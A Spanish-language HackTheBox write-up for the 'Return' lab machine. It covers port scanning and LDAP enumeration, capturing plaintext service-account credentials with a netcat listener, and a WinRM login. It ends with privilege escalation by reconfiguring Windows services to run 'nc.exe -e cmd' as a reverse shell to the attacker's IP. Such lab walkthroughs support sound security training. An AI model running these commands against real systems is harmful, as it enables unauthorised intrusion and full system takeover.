HackTheBox Return

❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.108 -oG port

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack ttl 127
80/tcp   open  http             syn-ack ttl 127
88/tcp   open  kerberos-sec     syn-ack ttl 127
135/tcp  open  msrpc            syn-ack ttl 127
139/tcp  open  netbios-ssn      syn-ack ttl 127
389/tcp  open  ldap             syn-ack ttl 127
445/tcp  open  microsoft-ds     syn-ack ttl 127
464/tcp  open  kpasswd5         syn-ack ttl 127
593/tcp  open  http-rpc-epmap   syn-ack ttl 127
636/tcp  open  ldapssl          syn-ack ttl 127
3268/tcp open  globalcatLDAP    syn-ack ttl 127
3269/tcp open  globalcatLDAPssl syn-ack ttl 127

Puertos abiertos.

❯ nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269 10.10.11.108 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-02 01:54 EDT
Nmap scan report for 10.10.11.108
Host is up (0.047s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-01 22:16:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -7h38m20s
| smb2-time: 
|   date: 2025-05-01T22:16:20
|_  start_date: N/A

Versiones y servicios que corren para cada uno de los puertos.

❯ ldapsearch -x -H ldap://10.10.11.108 -s base | grep 'ServiceName'
ldapServiceName: return.local:printer$@RETURN.LOCAL
dsServiceName: CN=NTDS Settings,CN=PRINTER,CN=Servers,CN=Default-First-Site-Na

Comprobamos el dominio y lo agregamos al etc/host.

❯ nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.14.47] from (UNKNOWN) [10.10.11.108] 49898
0*`%return\svc-printer
                      1edFg43012!!

Nos ponemos en escucha por el puertos que dice y recibimos unas credenciales.

ldapdomaindump

❯ ldapdomaindump -u 'return.local\svc-printer' -p '1edFg43012!!' 10.10.11.108 -o ldap
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
❯ cd ldap
❯ pwd
/home/kali/Desktop/HackTheBox/Return/content/ldap

Dumpeamos el DC para ir haciendonos una idea de todo y nos compartimos un servidor con python3 para verlo.

Observamos pocos usuarios y del usuario que tenemos credenciales observamos que forma parte del Remote Management Users.

❯ evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ..//Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> more user.txt
f68366c75611129ee26d5ca9c57ed667

*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

Nos conectamos y obtenemos la primera bandera.

Escalada Privilegios

*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 1:15:13 AM
Password expires             Never
Password changeable          5/27/2021 1:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/1/2025 3:26:29 PM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-printer\Documents>

Enumerando datos del usuario svc-printer vemos que está en el grupo Server Operators
Una búsqueda en Google nos revela que los usuarios que pertenecen a este grupo pueden entre otras cosas arrancar y parar servicios.

Antes que nada nos compartimos un servidor con python3 y nos descargamos desde la maquina nc.exe.

sc.exe config WdNisSvc binPath="C:\temp\nc.exe -e cmd 10.10.14.47 443"
sc.exe config VMTools binPath="C:\temp\nc.exe -e cmd 10.10.14.47 443"

sc.exe stop VMTools
sc.exe start VMTools

❯ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.47] from (UNKNOWN) [10.10.11.108] 49991
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Somos Administrator Maquina resuelta.

AnteriorHackTheBox Support SiguienteHackTheBox Timelapse

Última actualización hace 7 días

❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.108 -oG port PORT STATE SERVICE REASON 53/tcp open domain syn-ack ttl 127 80/tcp open http syn-ack ttl 127 88/tcp open kerberos-sec syn-ack ttl 127 135/tcp open msrpc syn-ack ttl 127 139/tcp open netbios-ssn syn-ack ttl 127 389/tcp open ldap syn-ack ttl 127 445/tcp open microsoft-ds syn-ack ttl 127 464/tcp open kpasswd5 syn-ack ttl 127 593/tcp open http-rpc-epmap syn-ack ttl 127 636/tcp open ldapssl syn-ack ttl 127 3268/tcp open globalcatLDAP syn-ack ttl 127 3269/tcp open globalcatLDAPssl syn-ack ttl 127

❯ nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269 10.10.11.108 -oN target.txt Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-02 01:54 EDT Nmap scan report for 10.10.11.108 Host is up (0.047s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: HTB Printer Admin Panel | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-01 22:16:14Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: -7h38m20s | smb2-time: | date: 2025-05-01T22:16:20 |_ start_date: N/A

❯ ldapsearch -x -H ldap://10.10.11.108 -s base | grep 'ServiceName' ldapServiceName: return.local:printer$@RETURN.LOCAL dsServiceName: CN=NTDS Settings,CN=PRINTER,CN=Servers,CN=Default-First-Site-Na

❯ ldapdomaindump -u 'return.local\svc-printer' -p '1edFg43012!!' 10.10.11.108 -o ldap [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished ❯ cd ldap ❯ pwd /home/kali/Desktop/HackTheBox/Return/content/ldap

❯ evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ..//Desktop *Evil-WinRM* PS C:\Users\svc-printer\Desktop> more user.txt f68366c75611129ee26d5ca9c57ed667 *Evil-WinRM* PS C:\Users\svc-printer\Desktop>

*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer User name svc-printer Full Name SVCPrinter Comment Service Account for Printer User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 5/26/2021 1:15:13 AM Password expires Never Password changeable 5/27/2021 1:15:13 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 5/1/2025 3:26:29 PM Logon hours allowed All Local Group Memberships *Print Operators *Remote Management Use *Server Operators Global Group memberships *Domain Users The command completed successfully. *Evil-WinRM* PS C:\Users\svc-printer\Documents>

sc.exe config WdNisSvc binPath="C:\temp\nc.exe -e cmd 10.10.14.47 443" sc.exe config VMTools binPath="C:\temp\nc.exe -e cmd 10.10.14.47 443" sc.exe stop VMTools sc.exe start VMTools ❯ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.47] from (UNKNOWN) [10.10.11.108] 49991 Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>